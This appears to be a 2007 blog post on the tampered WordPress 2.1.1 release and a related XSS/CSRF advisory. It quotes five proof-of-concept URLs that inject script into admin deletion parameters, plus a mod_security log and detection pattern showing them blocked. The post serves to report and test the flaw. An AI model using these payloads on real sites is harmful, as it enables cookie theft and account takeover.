Wordpress is dangerous, Upgrade now! seems to be a headline that is traveling the blogosphere in reference to the Wordpress 2.1.1 release. According to numerous websites, there are a number of vulnerabilities that are included within the 2.1.1 release and Wordpress.org is notifying their users of a dangerous release and asking everyone to download the new 2.1.2.

What I find interesting is how Wordpress.org is informing everyone that someone, aka a cracker gained access to their file-system and modified the original source of the WP2.1.1 download. Not all users were affected? According to the Wordpress XSS/CSRF advisory that was posted on February 27, 2007 the vulnerabilities existed within the post-parameter of wordpress.

What am I talking about?

Okay, so Stefan Friedli discovered some new vulnerabilities in Wordpress 2.1.1, tested them and wrote about them on February 27, 2007. The vulnerabilities were simply Cross site request forgeries (CSRF) calls to post-parameter of wordpress.

According to the advisory

This list may not be exhaustive. It illustrated that the flaw with confirmation dialogs in Wordpress is not limited to the “Delete Post”-function. Fixing the validation of the post parameter as suggested by e.g. Secunia does not fix the problem and does not reduce the threat of cross-site-scripting or any other webbased exploitation.

I tested the attack vectors and a few variants of each on my test server and a production server both running wordpress 2.1.1 and mod_security.

Possible injection…

… when deleting posts as mentioned in Samenspenders advisory (unvalidated parameter: post, file: post.php)
> http://target.tld/wp-admin/post.php?action=delete&post=
‘%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

… when deleting comments (unvalidated parameter: c, file: comment.php)
> http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c=
‘%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

… when deleting pages (unvalidated parameter: page, file: page.php)
> http://target.tld/wp-admin/page.php?action=delete&post=
‘%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

… when deleting categories (unvalidated parameter: cat_ID, file: categories.php)
> http://target.tld/wp-admin/categories.php?action=delete&cat_ID=
‘%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

… when deleting comments (unvalidated parameter: c, file: comment.php)
> http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c=
‘%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

mod_security definitely did its part by dis-allowing the attempt to successfully execute, the error_log showed:
[error] [client XXX.XXX.XXX.XXX] mod_security: Access denied with code 500. Pattern match "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>” at REQUEST_URI [hostname “target.tld”] [uri “/wp-admin/comment.php?action=deletecomment&p=35&c=’%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E”] [unique_id “eN3hmkZVwpIAAAgSjcIAAAAH”]

mod_security blocked each attack vector as well. Therefore, I believe it is safe to say, if you’re operating on version 2.1.1 and have not upgraded to 2.1.2, you might be safe. At least I’m not sweating the vulnerability. Its definitely difficult at times to keep up with Wordpress 0day XSS and CSRF vulnerabilities. Hopefully the kiddies haven’t gotten a hold of any major blocks because of this attack.

Just a little more info…

the full advisory